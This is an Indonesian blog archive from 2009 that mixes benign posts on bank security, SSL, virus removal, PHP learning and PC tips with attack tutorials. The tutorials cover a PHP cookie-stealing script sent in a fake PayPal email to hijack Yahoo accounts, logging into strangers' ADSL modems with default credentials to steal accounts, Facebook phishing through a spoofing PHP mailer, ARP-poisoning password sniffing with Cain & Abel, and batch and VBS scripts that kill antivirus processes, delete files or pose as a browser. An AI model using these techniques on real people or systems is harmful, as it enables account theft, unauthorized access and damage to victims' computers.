Archive for November 2009
Security yang di Terapkan BNI Internet Banking
BNI Internet Banking mempunyai sistem pengamanan sebagai berikut :
- Menggunakan sistem keamanan standar internasional dengan enskripsi SSL128 bit oleh Verisign. SSL 128 bit (Secure Socket Layer), yaitu lapisan pertama sistem pengamanan BNI Internet Banking yang lazim digunakan dalam dunia perbankan. Dengan menggunakan SSL ini, semua data yang dikirimkan dari server BNI Internet Banking ke komputer nasabah dan sebaliknya selalu melalui proses enkripsi (acak secara sistem) dengan menggunakan sandi 128-bit yang hanya diketahui oleh komputer nasabah dan server BNI Internet Banking. Dengan demikian, pihak-pihak lain tidak akan dapat mengartikan transmisi data tersebut apabila menerimanya.
- Pengamanan pintu akses BNI Internet Banking dengan firewall.
- Proses registrasi Layanan BNI Internet Banking dilakukan melalui BNI ATM menggunakan PIN BNI Card.
- Proses aktivasi melalui www.bni.co.id atau langsung ke https://ibank.bni.co.id menggunakan PIN registrasi dan nomor BNI Card yang digunakan untuk registrasi di BNI ATM.
- User ID dan Password dibuat oleh Pengguna saat aktivasi BNI Internet Banking, berupa kombinasi alphabet dan numeric (alphanumeric).
- Password BNI Internet Banking dapat diubah kapan saja oleh Pengguna BNI Internet Banking.
- Sistem BNI Internet Banking dilengkapi dengan session time out dimana akan otomatis Log Off.
- Alat tambahan untuk transaksi finansial menggunakan BNI e-Secure yang akan menghasilkan kombinasi angka yang berubah-ubah (dynamic PIN) setiap kali Pengguna melakukan transaksi.
- PIN BNI e-Secure dibuat oleh Pengguna dan digunakan setiap kali mengaktifkan/ menyalakan BNI e-Secure
- BNI e-Secure akan otomatis mati apabila tidak digunakan dalam waktu 45 (empat puluh lima) detik
- Pemblokiran layanan BNI Internet Banking dilakukan oleh Pengguna melalui permintaan kepada BNI PhonePlus melalui BNI Call.
- Limit transaksi finansial per hari dibatasi.
- Bukti transaksi BNI Internet Banking dapat dicetak dan atau disimpan sesuai keperluan pengguna.
- Buatlah User ID & Password BNI Internet Banking yang tidak mudah ditebak tetapi gampang diingat
- Rahasiakan Password BNI Internet Banking Anda dan jangan pernah memberitahukannya kepada orang lain
- Lakukan perubahan Password BNI Internet Banking secara berkala
- Jangan tinggalkan computer Anda saat Login ke layanan BNI Internet Banking dan selalu klik “logout” jika sudah selesai menggunakan
- Tolak layanan simpan otomatis User ID dan Password BNI Internet Banking pada saat browser menawarkan peyimpanan otomatis
- Jangan gunakan User ID atau Password atau Informasi pribadi lainnya ( Nomor rekening, Nomor Kartu ATM dan lain sebagainya) pada web-site yang tidak dikenal.
- Jika menggunakan koneksi dan alat nirkabel pastikan bahwa kemanannya cukup /memadai
- Biasakan untuk menghapus browser cache dan history setiap selesai bertransaksi
- Lindungi komputer anda dari virus dan program berbahaya lainnya
- Biasakan untuk melakukan check saldo rekening dan mutasi transaksi secara teratur
- Segera beritahukan kepada kami melalui BNI Call di 021 5789 9999 atau 68888 melalui ponsel Anda, jika mendapat masalah atau sesuatu yang mencurigakan
Apakah aman bertransaksi lewat warnet?
Bagaimana cara menghindari penipuan bermodus phishing
Apa itu phishing?
Bagaimana Phishing dilakukan?
- Penggunaan alamat e-mail palsu dan grafik untuk menyesatkan Nasabah sehingga Nasabah terpancing menerima keabsahan e-mail atau web sites. Agar tampak meyakinkan, pelaku juga seringkali memanfaatkan logo atau merk dagang milik lembaga resmi, seperti; bank atau penerbit kartu kredit. Pemalsuan ini dilakukan untuk memancing korban menyerahkan data pribadi, seperti; password, PIN dan nomor kartu kredit.
- Membuat situs palsu yang sama persis dengan situs resmi atau pelaku phishing mengirimkan e-mail yang berisikan link ke situs palsu tersebut.
- Membuat hyperlink ke web-site palsu atau menyediakan form isian yang ditempelkan pada e-mail yang dikirim
Bagaimana cara menghindari Phishing?
Jika Anda menerima e-mail seperti ini, segera laporkan kepada pihak BNI
Langkah-langkah apa yang harus dilakukan untuk memproteksi diri dari penipuan Phishing?
- Selalu ketikan URL yang lengkap untuk alamat situs / web-site resmi bank, yaitu: www.bni.co.id pada menu bar di browser Anda
- Jangan pernah membagi atau memberikan User ID atau Password BNI Internet Banking Anda pada orang lain bahkan staf BNI sekalipun. BNI tidak pernah menanyakan Password BNI Internet Banking untuk alasan apapun
- Jika Anda mendapatkan e-mail yang berisi pemberitahuan bahwa BNI akan menutup rekening atau User ID Anda, jika tidak melakukan konfirmasi dengan data-data pribadi, jangan reply atau mengklik link yang ada pada e-mail tersebut
- Jangan terpancing untuk mengikuti anjuran melakukan transfer ke rekening tertentu, dengan tujuan mendapatkan hadiah undian
Perlukah melaporkan lokasi phishing atau e-mail yang mencurigakan?
SSL (Secure Socket Layer)
SSL hanya mengenkripsikan data yang dikirim lewat http. Aturan SSL di disain untuk melakukan:
1. Encryption, untuk mengatasi eavesdropping
2. Data integrity, untuk mengatasi manipulation
3. Authentication, untuk mengatasi impersonation
Bagaimana SSL berjalan dapat digambarkan sebagai berikut :
- Pada saat koneksi mulai berjalan, klien dan server membuat dan mempertukarkan kunci rahasia, yang dipergunakan untuk mengenkripsi data yang akan dikomunikasikan. Meskipun sesi antara klien dan server diintip pihak lain, namun data yang terlihat sulit untuk dibaca karena sudah dienkripsi.
- SSL mendukung kriptografi public key, sehingga server dapat melakukan autentikasi dengan metode yang sudah dikenal umum seperti RSA dan Digital Signature Standard (DSS).
- SSL dapat melakukan verifikasi integritas sesi yang sedang berjalan dengan menggunakan algoritma digest seperti MD5 dan SHA. Hal ini menghindarkan pembajakan suatu sesi.
Oleh karena itu, banyak perusahaan E-commerce dan Banking yang sudah menggunakan SSL 128 bit untuk menjaga keamanan websitenya yang artinya akan membutuhkan waktu kira-kira 12.710.204.652.610.000.000.000.000 tahun untuk membobol informasi yang di enkripsi menggunakan RC4 yang dipakai di SSL, lumayan lama kan..
Walaupun informasi yang di enkripsi oleh SSL 128 bit sudah cukup sulit untuk bisa dibobol bukan berarti informasi tersebut akan selamanya aman dari para penjahat cyber dan tidak selamanya SSL akan melindungi informasi dari beberapa hal, misal :
* Denial of Services
* Buffer overflow
* Man-in-the-middle attack
* Cross scripting attack
Dan masih ada kemungkinan bahwa di SSL masih terdapat banyak celah keamanan yang bisa dilakukan dengan beberapa teknik.
About Salitiy
virus yang udah pernah tenar pada tahun 2003 kini kembali muncul dengan aksi yang lebih
“Berbahaya “….dari sebelumnya
virus ini dimasukkan kedalam kategory parasit abiz………..karena sasarannya file yang berekstensi exe……..
Salitiy menginfeksi setiap file yang berekstensi exe…………j Wal hasil ukuran file asli membengkak menjadi sekitar
20KB. Bagusnya lagi Salitiy meletakkan source code nya pada empty
segmen pada file yang ditumpangi dan mengubah entry poit asli ke bagun
awal tubunya sehingga yang pertama kali dijalankan adalah source code
palsu dan terkadang membuat file induk menjadi korup. PAda umunya file
induk langsung menutup diri sesaat dijalankan.
enyebarannya bisa dibilang “unik” karena setelah menginfeksi suatu
file EXE (PE), maka file yang baru terinfeksi tersebut yang akan
meneruskan aksi virusnya dan begitu seterusnya akanmencari korban
lainnya. Pada saat file yang terinfeksi di-kill, bukan mati aksinya
tapi diambil alih oleh predecessor- nya.
Untuk itu ada cara yang aman untuk menghilangkan virus ini tanpa mendelete langsung, dan saya sarankan (berdasarkan pengalaman) menggunakan cara ini:
1. download rmsality, virus removal khusus untuk virus sality dari Grisoft (produsen AVG), berisi tiga file yang harus anda dowload ke dalam satu folder http://free.grisoft.com/ww.virus-removal.ndi-67769
2. download fileASSASSIN http://www.malwarebytes.org/fa-setup.exe
===============================================
Langkah-langkah CARA NGATASINNYA...!!
1. Installkan dan jalankan fileASSASSIN dan arahkan / ketik di menu browsenya ke c:\windows\system32\wmdrtc32.dll delete file-nya di cheklist kemudian klik execute. ulangi untuk file yang kedua c:\windows\system32\wmdrtc32.dl_
2. jalankan program rmsality yang sudah di download dan biarkan melakukan proses scanning secara keseluruhan. setelah selesai anda akan mendapatkan beberapa file yang tidak bisa di clean (failed to clean) dan antivirus meminta anda untuk mereboot system. (anda juga bisa melakukan scanning per-drive dengan cara masuk ke menu run, kemudian ketik cmd, kemudian masuk ke direktori rmsality dimana anda menyimpannya, kemudian ketik contoh: rmsality c:
3. reboot system. untuk meyakinkan silahkan scan lagi dengan antivirus yang lain, seperti ANSAV, AVG dll
Yahoo Hacking
berinternet dan hacking .. Akan tetapi, percayakah anda bahwa jenis serangan inipun kerapkali menyerang berbagai
perusahaan raksasa seperti hotmail bahkan yahoo?? Dalam video ini kita akan sedikit bahas mengenai yahoo yang
terkena jenis serangan sejenis ini ..
Tidak percaya?! Mari kita buktikan :D
Pertama tama anda membutuhkan script ini:
User required to use Internet Explorer to view this file.
Yang kemudian perlu anda masukan kedalam file *.html
dan kemudian perlu anda attach dalam sebuah email .. :D
Selain itu andapun memerlukan file *.php yang berisikan script ini:
$cookie = $_GET['id'];
$cook = $_GET['cookie'];
$ip = getenv ('REMOTE_ADDR');
$date=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');
$fp = fopen('cookies.txt', 'a');
fwrite($fp, '
idu lu ala: ' .$cookie. 'Cookie: '.$cook.'
IP: ' .$ip. '
Referer: '.$referer.'
')
fclose($fp);
?>
Jangan lupa juga untuk menghostingkannya dalam hosting yang bisa accpet PHP..
Selain itu juga jgn lupa untuk membuat file cookies.txt dalam directory yang sama dengan script ini ..
Setelah memiliki script .php tadi dan setelah menghostingkannya dalam hosting server yang layak ..
Sekarang yang kita perlukan adalah mengirimkan scirpt pertama secara attachment ke email korban ..
Untuk membuat korban tidak curiga .. Ada baiknya script tersebut disisipkan dalam HTML code lain :D
Dalam kasus ini saya menggunakan Paypal Letters :D
Now .. WHen ur victim membuka email mereka dengan menggunakan Internet Explorer ..
Mereka akan mendapatkan email tersebut hanya sebagai notifikasi letters dari Paypal ..
Berikut contohnya :D
Yay !!!
Paypal letters!!!
But.. Is that all ?? :D
OWNED!!!!
Hahaha
U've got the Cookies !!!
Nice, huh?! :D
Sekarang bagaimana kita memanfaatkan cookie tersebut?!
Mudah saja .. Yang anda perlukan adalah Y dan T .. :D
Berikut adalah contoh yang akan saya lakukan menggunakan account orang philliphine yang kena tipu muslihat paypal xD
woops!!
My bad ..
My victim changed his Pass already ;D
Coba kita gunakan pass pribadi :D
Logged in after logout .. And its WITHOUT PASSWORD !!!
Hehehehe
OWNED !!!
Well .. Mohon maaf karena tadi contoh yang saya berikan sudah mengganti password nya ..
I've got some more .. Tapi gak isa dipercobakan 1 per 1 :D
Yay!!!
Hhahaha
Hacking Modem ADSL dan Account Speedy
sebenarnya saya sangat malu menggunakan kata "hack" di
atas, maklum sebagai seorang newbie saya belum pantas menggunakan
kata tersebut,, apalagi taknik yang akan dituliskan ini
hanya merupakan cara yang cukup sederhana dan sudah banyak di pasaran
tapi karena mungkin masih ada yang belum tau jadi izeng² saya posting aja.. hehe..
ehm.. sebelumnya yang sudah merasa master sangat disarankan untuk berhenti membaca tulisan ini..
jadi langsung saja...
logikanya sepert ini ;
- Mecari target
- Mencoba login ke Modemnya
- Lock The Target
Sekedar cerita, saya pernah berkenjung ke warnet teman saya
setelah bosan maen games (skill saya cuma bisa maen game.. hiz..hikz..),
tanpa sengaja http://my-ip.info terbuka dengan sendirinya,
http://img187.imageshack.u
trus iseng² saya memasukkan IP saya pada browser.. dan browser langsung
memunculkan menu pop-up untuk meminta username n passwd dari modem yang digunakan..
http://img7.imageshack.us/
kemudian saya memasukkan default username dan passwd modem ADSL
yaitu admin:admin dan bummmmmmm..!!!! Berhasil masuk ke dalam system modem tersebut..
http://img7.imageshack.us/
Kalian bisa mendapatkan hasil yang lebih besar dengan melakukan scanning IP range dari 1-255 dari IP yang kalian temukan.
http://img20.imageshack.us
http://img20.imageshack.us
Untuk mendapatkan IP dari account speedy, kebanyakan bisa ditemukan di IRC, dengan join ke channel² yang ramai dikunjungi dan
melakukan /who #namachannnel pada status server (seperti dalnet)
http://img20.imageshack.us
http://img205.imageshack.u
or bisa menggunakan sedikit SocEng pada user² dalam channel kemudian
melakukan /whois nick untuk mendapatkan IPnya, itu juga untuk memastikan bahwa target kita bukan sebuah bot.
Yang pasti intinya yaitu mencoba masuk pada modem ADSL target dengan memanfaatkan pemahaman kita tentang username n passwd modem ADSL,, dan apabila berhasil login dan masuk pada system modem tersebut, kita bisa melakukan apa saja terhadap korban mulai dari memblock URL sampai pencurian account speedy (hehe.. Inet gratis dund)
tergantung kekreatifan kalian.. ^_^ (
Hack Facebook
(teknik phishing adalah teknik yang digunakan untuk meminta agar calon korban memberikan data accountnya)
dengan memadukan 2 teknik,yaitu
1. Social Engineering,
2. Manipulasi Link,
Cara yg pertama di gunakan untuk melakukan pendekatan secara mental ke si Target dengan cara apapun.karena kita ada di dunia electronik maka kita juga harus menggunakan pendekatan secara elektronik..
ya itu dengan cara yg paling simple,,yaitu mengirimkan e-mail ( bukan amel ya ) ke korban untuk meminta secara langsung account si target,tp ap mungkin?
----------------
jangan patah semangat dulu,cari gorengan ato cemilan dulu, segelas energen, ato foto pacar bwt tambah semangat..
nah kl udah sekrang waktunya untuk Taking Action..
agar si Target mau memberikan Accoutnya maka paling tidak kita harus bs meggunakan cloaking,atau teknik menyamar..
kita kirim e-mail ke korban dengan menggatas nama kan admin@facebook.com
tp bagaimana caranya?...xixix
inget bwt yg master tinggalin aj ya ini topik...
kita bikin PHP MAILER dr sini kita bs mengirim e mail atas nama siapa saja yg kita ingin kan...dan bahkan atas nama admin@facebook.com
cara bikinya mudah kok,
1. cari PHP SHELL, bs beli ato minta aj ke para master, inget PHP SHELL ya..
trus tinggal bikin PHP MAILER nya..untuk Scripnya sudah ak sediakan
di sini https://www.thinkfasttoys.
ubah mailer.txt menjadi mailer.php
nah sudah dech, tinggal isi kolom alamat e-mail target, isi, dari dan sub tentunya, kl bs yg isinya kita minta untuk mengirimkan account dy ke alamt e-mail kita..
setelh itu semua jadi, tingal cari taget dech...
untuk demostrasi,..
Mempercepat Koneksi Internet
Cara Pertama
Dari Control Panel, klik icon Modem. Pada kotak dialog Modem Properties, pilih modem yang akan diubah settingnya dan klik pada tombol Properties Pada tab General, ubah Maximum Speed menjadi 115200. Pindah ke tab Connection dan klik tombol Port Setting. Dari kotak dialog Advanced Port Setting, beri tanda check pada Use FIFO buffers. Kemudian ubah Receive Buffer menjadi 14 dan Transmit Buffer menjadi 16. Lalu klik OK. Klik button Advanced, beri tanda check pada Use Flow Control. Kemudian pilih radio button Hardware. Pada bagian Extra Setting, isi dengan &C1&D2E1Q0V1X4%C0 S7=55 S11=55 S0=0.
Cara Kedua
Dari Control Panel, klik icon System. Pindah ke tab Device Manager. Pada bagian Ports (COM & LPT), pilih port yang digunakan oleh modem Anda dan klik tombol Properties. Pindah ke tab Port Settings. Pada bagian Bits per second, isi dengan 921600.
Cara Ketiga
Buka file system.ini yang terletak di C:\Windows. Pada bagian [386Enh], tambahkan dengan COM1Buffer=16384. Ubah COM1 dengan port yang digunakan oleh modem.
Pemrograman Virus Batch
Virus batch dibuat di notepad dan disimpan dengan ekstensi ”.bat”. Ternyata selain virus VBS masih ada juga virus yang dibuat pake notepad. Yah salah satunya virus BAT (virus Batch).
Kalo kmu hidupkan file notepad kosong dengan ekstensi ”.bat”, yang muncul malah ”bla bla bla is not valid 32 application”
Itu artinya kita harus masukkan code virus ke dalam tubuh file bat itu.. he he he he….
Kali ini akan saya ajarkan kalian… tapi ingat saya tidak bertanggung jawab atas kecerobohan kalian…
Pertama sekali ketik:
@echo off
Yang itu memang mesti ditulis, supaya file tidak memunculkan seluruh command. Dan ini wajib (dianjurkan bozzz). Gak diketik begitu juga gak apa-apa sih sebenarnya…
Baru setelah itu kita ketik code-code virus lainnya… he he he
Ini contoh-contoh code-nya…
Untuk meng-kill process yang aktif:
Tskill AVGUARD
Perhatikan: untuk meng-kill process ketik ”tskill” lalu nama process-nya tapi tanpa ekstensi…
Contoh lain:
Tskill KAV
Untuk menghapus file:
del C:\Progra~1\Accessories\Ca
Membuat Fake Virus Pada Mozilla & IE dengan VBS
di sini adalah mantranya (simpan sebagai mozilla.vbs ato internet explorer.vbs):
set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.Run "iexplore.Exe"
On Error Resume Next
Set wshShell = wscript.CreateObject("WScript.Shell")
Dim Wsh
Set Wsh = WScript.CreateObject("WScript.Shell")
Set shell = CreateObject("Wscript.Shell")
Set objScriptExec = objShell.Exec("shutdown -a")
Set objShell = CreateObject("WScript.Shell")
wscript.Sleep 1000
Wsh.Run "Notepad.Exe", 1
Wscript.Sleep 900
Wshshell.Sendkeys "(Loading)"
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "."
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 125
Wshshell.Sendkeys "{bs}"
Wscript.Sleep 800
Wshshell.Sendkeys "^a"
Wshshell.Sendkeys "{bs}"
Wshshell.Sendkeys "Virus Loaded"
Wscript.Sleep 900
Wshshell.Sendkeys "^a"
Wshshell.Sendkeys "{bs}"
Wshshell.Sendkeys "%{f4}"
Msgbox"Windows has detected a virus",16,"Virus detector"
Wscript.Sleep 900
sembunyikan shortcut mozila dan IE yg asli di suatu tempat, dan kemudian tulis kan script yang ada diatas menggunakan notepad simpan dengan *.VBS, trus buat shortcut yang terlihat seperti mozilla dan IE.
caranya :
klik kanan file *.VBS>properties> shortcut> change icon (ganti dengan icon mozilla ato IE)
Cara mudah belajar PHP
Silahkan simak tips belajar PHP menurut pengalaman penulis berikut resource-resource yang mendukung.
Hal yang patut digaris bawahi, belajar madiri lebih bagus daripada belajar seperti kalau kita kursus PHP. Dan kebanyakan orang yang pinter PHP bisa karena belajar mandiri. Tidak percaya? Silahkan adakan survey sendiri becanda kok.
1. akrabkan diri dengan HTML,
Walaupun Anda menggunakan PHP Anda tidak akan terlepas dari tag-tag HTML.
Berikut referensi berbahasa Indonesia yang bisa digunakan:
- http://www.webmaster-tutorial.com/tutorial/What_is_HTML/1/4
- http://www.freewebs.com/buatsite/buatsite02.htm
- http://unilanet.unila.ac.id/index.php?option=displaypage&Itemid=73&op=page&SubMenu=
- http://lecturer.eepis-its.edu/~riyanto/web1.html
- http://werbach.com/barebones/barebone_id.html
2. akrabkan diri aplikasi web authoring: dreamweaver, NVU dan kompozer portable
- tutorial dreamweaver
- kompozer, sebuah tool web authoring gratis mirip dreamweaver
3. perdalam HTML yang berhubungan dengan form,
Mengapa form? karena banyak transaksi di PHP nantinya menggunakan form, misalnya untuk memasukkan data ke dalam database
Referensi:
- http://werbach.com/barebones/barebone_id.html#forms
4. Berkenalan lebih dekat dengan PHP,
baca referensi ini :
- http://www.rumahweb.com/journal/berkenalan-dengan-php.htm
- http://www.rumahweb.com/journal/php-mysql-tutorial-dasar.htm
- ebook php
5. mengenal variabel-variabel PHP:
- http://phpug.freeservers.com/manual/variabel.htm
6. berkenalan dengan php dan form,
- form dan php
- membuat login form
7. bergabung dengan forum diskusi,
Berikut forum diskusi yang bisa diikuti:
- www.diskusiweb.com
- www.kaskus.us
- http://myquran.org/forum/
8. aktif di mailing list:
- milis PHPUG
9. jangan malu bertanya, japri lebih enak
Jangan ragu untuk memulai thread di forum dan coba kirim private message atau email privat ke orang yang Anda rasa bisa dimintai tolong
10. download PHP manual
- manual PHP berbahasa Inggris
- manual PHP berbahasa Indonesia , http://phpug.freeservers.com/
11. install webserver di komputer Anda
- install web dan database server di komputer Anda
12. menulis aplikasi sederhana
belajarlah menulis aplikasi sederhana, misal membuat hit counter, mencari bilangan prima atau lainnya.
13. tidak harus menghafal script
Syntax-syntax yang ada tidak harus dihafalkan. Tapi untuk difahami. Apabila lupa bisa melihat ke php manual. Atau siapkan contekan khusus syntax-syntax apa saja yang sering Anda gunakan.
- PHP cheat sheet
14. menginstall aplikasi sederhana
- Cara menginstal sNews CMS di local server
Atau cari script-script PHP dari www.hotscripts.com/php kemudian coba install di komputer lokal Anda
Resource lain ada di sini:
- referensi 10 situs penyedia resource PHP
15. mengedit aplikasi sederhana
Coba untuk mengedit script-script yang ada. Misalnya coba edit CMS sederhana misalnya sNews kemudian tambahkan mod yang tersedia di forumnya.
16. berkenalan dengan MySQL
- http://cs.uad.ac.id/riadi/2006/03/30/belajar-mysql/
- dasar-dasar php dan mysql pdf
- dasar pemrograman php dan mysql pdf
17. Daftar ke penyedia hosting gratis
daftar ke penyedia hosting gratis. Pilih yang tanpa banner dengan fasilitas PHP dan MySQL.
Pilih salah satu di sini:
- http://www.absolutely-free-hosting.com/free-php-hosting.php
- hosting gratis 2 minggu di rumahweb
18. Upload lewat FTP
- pdf cara upload lewat ftp
Anda bisa memeperoleh software ftp secara gratis di sini:
- http://www.filehippo.com/software/ftp/
kalau penulis menggunakan core ftp yang downloadnya di sini
19. jangan pernah puas, baca yang lebih banyak.
Gunakan google untuk mencari Semua hal ada di situ. Aktif di forum, milis, kalau perlu gabung dengan forum yang berbahasa inggris.Banyak yang Anda bisa dapat dari situ.
PHP Login script
|
| |
 | |
|
| ||||||||||
| ||||||||||||||||||||||||
| ||||||||||
| |||||||||
| |||||||||
| |||||||||
 | Encrypting Password - Make your Login More Secure | ||
| |||
| |||
Tutorial mysql database menggunakan phpmyadmin dan cpanel
2. Setelah database selesai dibuat, akan muncul database baru dengan nama nyoba_testing.
3. Jika anda menggunakan PHP, silahkan buat username dan password untuk akses ke database tersebut. Anda bisa menggunakan menu create user untuk melakukan penambahan username.
4. Langkah selanjutnya adalah menghubungkan user ke database , dengan cara pilih usernya, kemudian databasenya, lalu privileges yang diberikan (defaultnya adalah All), kemudian klik Add User to Database
5. Setelah itu, akan muncul koneksi baru yang bisa anda gunakan di script PHP maupun Perl anda :
Users in testing
nyoba_testinguse (Privileges: ALL PRIVILEGES)
Connection Strings
Perl $dbh = DBI->connect(”DBI:mysql:nyoba_testing:localhost”,”nyoba_testinguse”,”");
PHP $dbh=mysql_connect (”localhost”, “nyoba_testinguse”, “”) or die (’I cannot connect to the database because: ‘ . mysql_error());
mysql_select_db (”nyoba_testing”);
Dari ilustrasi diatas, penulis membuat user nyoba_testinguse untuk terkoneksi ke database nyoba_testing
6. Jika anda sudah mempunyai file sql dan ingin mengupload data sql anda, silahkan klik phpmyadmin pada bagian paling bawah.
7. Setelah masuk ke phpmyadmin, pilih database yang digunakan, kemudian pada halaman sebelah kanan, pilih Import , browse pada file sql anda, kemudian klik Go untuk melanjutkan. Jika import anda sukses, akan muncul laporan “Import has been successfully finished”
8. Anda juga bisa menggunakan phpmyadmin ini untuk mengadministrasi database anda, seperti melihat data, query sql, export, rename, dll.
Nyedot Password FB pake Cain & abel
1. Download dulu Tools Cain & abel di Home http://www.oxid.it
2. nah kalau sudah di download , install Cain & abel (gax mungkin kan gax ada yang tau cara nginstall software) Di cain & abel entu sudah tersedia t software tambahan yaitu “wincap” nah itu install juga Coz klaw gax ada itu “wincap” nya Cain gax bias Jlan.
3. Nah kalau sudah Di Install semua saat nya Memulai Penulusuran :
1. Jalan kan Cain & abel .
2. Kalau ada perintah datang saat menjalan kan Cain abel Pilih “UNLOCK”
3. Jika suda masuk pada cain abel Pilih TAB “configure” akan Muncul TAB Baru cari IP yang terhubung Dengan IP Komputer lain dan kalau sudah OK.
4. Lalu pilih “start/stop sniffer” pada tab di atas atau gambar berwarna Hijau tuk Memulai Atau Menjalan kan Cain .
5. Setelah memilih gambar tersebut Lanjukan dengan Memilih “star/stop APR” yang berwarna kuning di sebelah “start/stop sniffer”
6. Lanjut tuk memilih gambar Dengan Tanda Plus/tambah maka aka ada pilihan Baru dan Klik OK maka Otomatis Cain akan Menscan Mac dan IP address orang lain .
7. Lanjut Kita Pilih “Sniffer “ pada tab
8. Selanjutnya pilih status yang ada pada Tab sniffer dan pilih Gambar Plus/Tambah lagi. Maka akan muncul “new ARP poison Rounting”
9. Pilih/Blok Semua Alamat IP yang ada . Pilih Ok .
10. Lanjut Pilih “Password” pada tab yang ada di bawah .
11. Dan Pilih (HTTP) yang ada pada Opsi Password .
12. Tungguin dech tu alamat email dan Password yang bakaln masuk .
13. Terserah dech tu email mau di apain.
Tampang tiga hacker indonesia
- Dani Firmansyah
xnuxer, nama panggilan Dani Firmansyah di dunia bawah tanah, di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta.
Jumat 16 April, Xnuxer mencoba melakukan tes sistem sekuriti kpu.go.id melalui XSS (cross site scripting) dari IP 202.158.10.117, namun dilayar keluar message risk dengan level low (website KPU belum tembus atau rusak).
Sabtu 17 April 2004 pukul 03.12,42, Xnuxer mencoba lagi melakukan penetrasi ke server tnp.kpu.go.id dengan cara SQL Injection dan berhasil menembus IP tnp.kpu.go.id 203.130.201.134, serta berhasil meng-up date daftar nama partai pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang dipakai Xnuxer dalam meng-hack yakni melalui teknik spoofing (penyesatan). Xnuxer melakukan serangan dari IP 202.158.10.117, kemudian membuka IP Proxy Anonymous Thailand 208.147.1.1 sebelum msuk ke IP tnp.kpu.go.id 203.130.201.134, dan berhasil membuka tampilan nama 24 partai politik peserta pemilu.
Beruntung Xnuxer meng-hack situs KPU hanya karena ingin mengetes keamanan sistem keamanan server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat Xnuxer yang sangat cooperatif, akhirnya Xnuxer hanya di bui beberapa bulan saja.
- Onno Widodo Purbo
Onno Widodo Purbo (lahir di Bandung 17 Agustus 1962; umur 45 tahun) adalah seorang tokoh (yang kemudian lebih dikenal sebagai pakar di bidang) teknologi informasi asal Indonesia. Ia memulai pendidikan akademis di ITB pada jurusan Teknik Elektro pada tahun 1981. Enam tahun kemudian ia lulus dengan predikat wisudawan terbaik, kemudian melanjutkan studi ke Kanada dengan beasiswa dari PAU-ME.
RT/RW-Net adalah salah satu dari sekian banyak gagasan yang dilontarkan. Ia juga aktif menulis dalam bidang teknologi informasi media, seminar, konferensi nasional maupun internasional. Percaya filosofy copyleft, banyak tulisannya dipublikasi secara gratis di internet.
Pejuang kemerdekaan frekuensi 2.4 GHz, VOIP-Rakyat, dan Antena Wifi dari kaleng.
- I Made Wiryana A.K.A Pak Made
Cyber Paspampres nih, konon website dan server President SBY beliau yang pegang untuk maintenance dan keamanannya… (pernah digempur ampe DDos, namun dalam waktu itungan detik back-up server –ga tau dah back-up yang nomor berapa– langsung up).
Beliau juga pelopor perkembangan linux di indonesia bersama pak Rusmanto (redaktur Info Linux) and yangh pasti dia Dosen gw (GUNADARMA), menyelesaikan pendidikan di dua institusi pendidikan yaitu S1-Fisika Universitas Indonesia pada tahun 1991 dan S1-manajemen Informatika STIMIK Gunadarma tahun 1992 dan melanjutkan Magister di eidith cowan university Australia dan sejak tahun 2004 sampai sekarang sedang menyelesaikan program Doktoral di RVS Bielfield Jerman. Dan sekarang berdomisili di Jerman. Status pekerjaannya adalah Dosen Tetap universitas Gunadarma.
Menjalankan Banyak Account Yahoo Messenger
Yahoo Messenger (YM) merupakan salah satu messenger yang paling dipakai untuk berkomunikasi via media teks (chat) secara online. Dengan menggunakan YM Anda dapat berkomunikasi dengan teman, saudara atau relasi.
Normalnya Anda hanya dapat menjalankan satu kali YM pada saat bersamaan. Dengan tips berikut ini Anda bisa menjalankan YM beberapa kali sehingga pada saat yang sama Anda dapat login dengan menggunakan beberapa account yahoo Anda.
Caranya adalah sebagai berikut:
- Jalankan registry editor dengan cara klik tombol Start - Run. Ketik regedit lalu tekan enter.
- Masuk ke key HKEY_CURRENT_USER\Software\Yahoo\Pager\Test.
- Pada panel sebelah kanan, klik kanan dan pilih menu New - DWord Value.
- Ketik Plural.
- Klik 2x pada Plural dan isi dengan nilai 1 (satu).
- Keluar dari registry editor.
Jika Anda mengikuti langkah di atas dengan benar maka Anda bisa menjalankan YM beberapa kali.
Cara mengaktifkan facebook yang di blokir/disable
ada 2 cara yaitu, gunakan “forgot password”, namun bila belum berhasil silahkan gunakan cara dibawah ini
Nah sekarang coba kita lihat step-step apa yang di sruh oleh facebook team untuk mengembalikan akun FB yang terdisable, dan ujung-ujung nya kita akan disuruh mengirim email ke “facebook team” untuk menjelaskan bahwa kita memohon akun kita di aktifkan kembali dan kita berjanji tidak akan mengulangi kesalahan yang mengakibatkan akun kita terblokir (add terlalu banyak teman, menggunakan nama palsu, profil palsu, gambar porno dll), namun bila itu semua tidak kita lakukan maka kita dapat mengklaim lewat email bahwa kita merupakan korban salah tangkap oleh “facebook team”.
NOTE: untuk mengaktifkan FB hanya bisa dilakukan oleh si pemilik email, karena hanya si pemilik email yang bisa masuk ke akun email mereka dan megirim email kepada facebook team
NOTE: Saya tidak bisa membantu dalam mengaktifkan facebook anda kembali, karena yang mengirim email ke facebook team adalah anda sendiri, karena anda yang tau password email anda dan dapat menulis email tersebut.
Daftar File Hosting Terbaik 2009
Berikut adalah beberapa situs file hosting terbaik:
